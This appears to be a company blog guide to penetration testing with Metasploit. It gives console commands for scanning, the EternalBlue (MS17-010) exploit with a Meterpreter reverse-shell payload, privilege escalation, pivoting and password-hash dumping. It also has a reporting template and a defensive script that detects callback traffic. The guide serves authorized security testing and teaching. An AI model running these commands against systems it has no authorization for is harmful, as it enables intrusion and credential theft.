Cybersecurity October 13, 2025 14 min read

Conducting Penetration Tests with Metasploit: A Short Guide

Penetration testing allows organizations to identify vulnerabilities before malicious actors can exploit them. We're diving into Metasploit to explore its capabilities.

Software Engineer

Schild Technologies

Penetration testing allows organizations to identify vulnerabilities before malicious actors can exploit them. Among the many tools available to security professionals, Metasploit stands out as one of the most powerful frameworks. This guide walks through a penetration test using Metasploit, with a specific focus on identifying and exploiting vulnerable network services—one of the most common attack vectors in real-world scenarios.

Before launching any penetration test, establish a proper legal and ethical basis: explicit authorization and proper documentation. That is the difference between legitimate security testing and criminal hacking.

Understanding the testing methodology

Professional penetration testing follows a structured methodology. For this guide, we'll focus on a service-based attack approach:

  1. Reconnaissance: Gathering information about the target
  2. Scanning and enumeration: Identifying live hosts and open services
  3. Vulnerability identification: Finding potential security weaknesses
  4. Exploitation: Attempting to compromise vulnerable services
  5. Post-exploitation: Determining the impact of successful exploitation
  6. Reporting: Documenting findings and recommendations

Setting up your testing environment

For this walkthrough, we'll assume you're using Kali Linux, which comes with Metasploit pre-installed. If you're using another distribution, install Metasploit from the official repository.

Start by ensuring the Metasploit database is properly configured:

# Initialize the Metasploit database
sudo msfdb init

# Start the PostgreSQL service if needed
sudo systemctl start postgresql

# Launch the Metasploit console
msfconsole

The Metasploit console (msfconsole) is your primary interface. You should see the distinctive Metasploit banner and the msf6 > prompt.

Phase 1: Reconnaissance and scanning

Before exploiting anything, you need to understand the target environment. We'll use Metasploit's built-in scanning capabilities.

Port scanning:

# Use the TCP port scanner auxiliary module
msf6 > use auxiliary/scanner/portscan/tcp

# Set the target IP range (replace with your authorized target)
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000

# Configure threading for faster scanning
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 10

# Run the scan
msf6 auxiliary(scanner/portscan/tcp) > run

This scan identifies open ports on your target. Pay special attention to common service ports like 21 (FTP), 22 (SSH), 80 (HTTP), 139/445 (SMB), and 3389 (RDP).

Phase 2: Service enumeration

Once open ports are identified, determine what services are running and their versions. This information is crucial for identifying potential vulnerabilities.

Service version detection:

# SMB version detection
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_version) > run

# SSH version detection
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/ssh/ssh_version) > run

# HTTP version detection
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/http_version) > run

For more comprehensive service enumeration, integrate Nmap with Metasploit:

# Exit Metasploit temporarily
msf6 > exit

# Run Nmap with service version detection
nmap -sV -p- 192.168.1.100 -oX scan_results.xml

# Import results back into Metasploit
msfconsole
msf6 > db_import scan_results.xml
msf6 > hosts
msf6 > services

The db_import command brings your Nmap results into Metasploit's database, allowing you to reference discovered hosts and services throughout your engagement.

Phase 3: Vulnerability identification

With service information in hand, search for known vulnerabilities. Metasploit's search functionality is powerful and allows you to query by service, CVE number, or platform.

Searching for exploits:

# Search for exploits affecting a specific service
msf6 > search type:exploit platform:windows smb

# Search by CVE number
msf6 > search cve:2017-0144

# Search for auxiliary modules (scanners, fuzzers)
msf6 > search type:auxiliary smb

For this walkthrough, let's focus on testing an SMB service, as it's commonly misconfigured and has well-documented vulnerabilities.

SMB vulnerability scanning:

# Use the SMB version scanner
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_version) > run

# Check for EternalBlue vulnerability (MS17-010)
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

The MS17-010 scanner reports whether the target is vulnerable to EternalBlue, a significant SMBv1 vulnerability disclosed in 2017.

Phase 4: Exploitation

If the vulnerability scanner indicates the target is vulnerable, you can proceed with exploitation.

Check the module documentation beforehand to understand its impact:

# Show the module description, targets and references
msf6 > info exploit/windows/smb/ms17_010_eternalblue

Configuring the exploit module:

# Load the EternalBlue exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# View required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Configure the target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100

# Select a payload (what runs after successful exploitation)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Configure the payload to connect back to your machine
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444

# Verify all settings
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Understanding payloads: The payload is the code that executes on the target after successful exploitation. Common payload types include:

  • Meterpreter: A powerful, feature-rich payload that provides interactive shell access and many post-exploitation tools
  • Shell payloads: Simple command shells (cmd.exe or /bin/sh)
  • Staged vs. non-staged: Staged payloads are sent in pieces (smaller initial footprint), while non-staged payloads are sent complete

Executing the exploit:

# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Or use 'run' as an alias
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

If successful, you'll receive a Meterpreter session—an interactive post-exploitation framework that provides extensive control over the compromised system.
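From the defender's side, the reverse_tcp payload configured above shows up on the network as the SMB server opening a brand-new outbound connection to the very host that just contacted its port 445. The following detection script is an added example, not code from the article; the flow-record format, the egress allowlist and the 60-second window are assumptions, and the records are constructed.

```python
from collections import defaultdict

# Constructed flow records (not real logs): timestamp src_ip src_port dst_ip dst_port
SAMPLE_FLOWS = """\
1700000000 192.168.1.50 50231 192.168.1.100 445
1700000001 192.168.1.50 50232 192.168.1.100 445
1700000003 192.168.1.100 49321 192.168.1.50 4444
1700000100 192.168.1.10 51000 192.168.1.100 445
1700000105 192.168.1.100 49400 192.168.1.20 443
"""
ALLOWED_EGRESS_PORTS = {53, 80, 443}  # outbound ports a file server is expected to use
WINDOW_SECONDS = 60                    # max gap between SMB contact and the callback

def parse_flows(text):
    """Parse the whitespace-separated records into (ts, src, sport, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        ts, src, sport, dst, dport = line.split()
        flows.append((int(ts), src, int(sport), dst, int(dport)))
    return flows

def find_smb_callbacks(flows):
    """Return (server, remote_ip, callback_port, delay_seconds) for each suspicious pair."""
    last_smb_contact = defaultdict(dict)  # server -> {remote_ip: last inbound 445 timestamp}
    alerts = []
    for ts, src, _sport, dst, dport in sorted(flows):
        if dport == 445:
            last_smb_contact[dst][src] = ts   # remote host touched the server's SMB port
            continue
        if dport in ALLOWED_EGRESS_PORTS:
            continue                           # ordinary outbound traffic
        # Server opening a new connection back to a host that just hit its SMB port
        contact = last_smb_contact.get(src, {}).get(dst)
        if contact is not None and 0 <= ts - contact <= WINDOW_SECONDS:
            alerts.append((src, dst, dport, ts - contact))
    return alerts

if __name__ == "__main__":
    for server, remote, port, delay in find_smb_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"{server} connected back to {remote}:{port} {delay}s after inbound SMB")
```

The same pairing logic applies to any non-allowlisted callback port, not only 4444, which is why the allowlist rather than the port number drives the alert.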

Phase 5: Impact assessment

The goal of ethical penetration testing isn't to cause damage—it's to demonstrate risk and determine the potential impact of a real attack. Post-exploitation activities should be carefully scoped and documented.

Basic Meterpreter commands:

# View system information
meterpreter > sysinfo

# Check your privilege level
meterpreter > getuid

# List running processes
meterpreter > ps

# Capture a screenshot (demonstrates access without exfiltration)
meterpreter > screenshot

# Check network configuration
meterpreter > ipconfig

Privilege escalation assessment:

Determine whether you can elevate privileges from a standard user to SYSTEM (Windows) or root (Linux):

# Attempt automatic privilege escalation
meterpreter > getsystem

# If successful, verify
meterpreter > getuid
# Should show NT AUTHORITY\SYSTEM

Lateral movement assessment:

Check whether the compromised system could be used as a pivot point to access other network resources:

# View network connections
meterpreter > netstat

# Add a route to scan internal networks through the compromised host
meterpreter > run autoroute -s 10.0.0.0/24

# Background the current session
meterpreter > background

# Run additional scans through the compromised host
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.0.1-254
msf6 auxiliary(scanner/portscan/tcp) > run

Credential harvesting assessment:

Demonstrate the risk of credential theft without actually stealing credentials:

# Access password hashes (requires SYSTEM privileges from earlier escalation)
meterpreter > hashdump

# Stop here

Phase 6: Documentation and reporting

Conclude the test and prepare findings. Thorough documentation ensures findings translate into actionable security improvements.

Exit:

# Exit the Meterpreter session
meterpreter > exit

# Review all sessions
msf6 > sessions -l

# Kill all sessions when testing is complete
msf6 > sessions -K

Essential documentation elements:

  1. Executive Summary: High-level findings for non-technical stakeholders
  2. Methodology: The approach and tools used
  3. Findings: Each vulnerability discovered, including:
     • Severity rating (Critical, High, Medium, Low)
     • Affected systems and services
     • Technical description
     • Proof of concept (screenshots, command output)
     • Business impact
     • Remediation recommendations
  4. Timeline: When each test was conducted
  5. Scope: What was and wasn't tested

Sample finding structure:

Finding: Unpatched SMB Service Vulnerable to MS17-010

Severity: Critical

Affected Systems:
- 192.168.1.100 (Windows Server 2008 R2)

Description:
The SMB service on the target system is vulnerable to MS17-010 
(EternalBlue), allowing remote code execution without authentication.

Proof of Concept:
[Include sanitized command output and screenshots]

Impact:
An attacker could gain complete control of the system, access 
sensitive data, install malware, or use the system as a pivot 
point to attack other network resources.

Remediation:
1. Apply Microsoft Security Bulletin MS17-010 immediately
2. Disable SMBv1 protocol
3. Implement network segmentation
4. Enable host-based firewall rules to restrict SMB access

Conclusion

Metasploit's extensive module library, database integration, and post-exploitation capabilities make it an essential framework for security professionals. The service-based testing methodology demonstrated here—from reconnaissance through documentation—provides a structured approach to identifying vulnerabilities in network services. Properly applied, Metasploit's capabilities deliver the technical evidence organizations need to make informed security decisions.

© 2025 Schild Technologies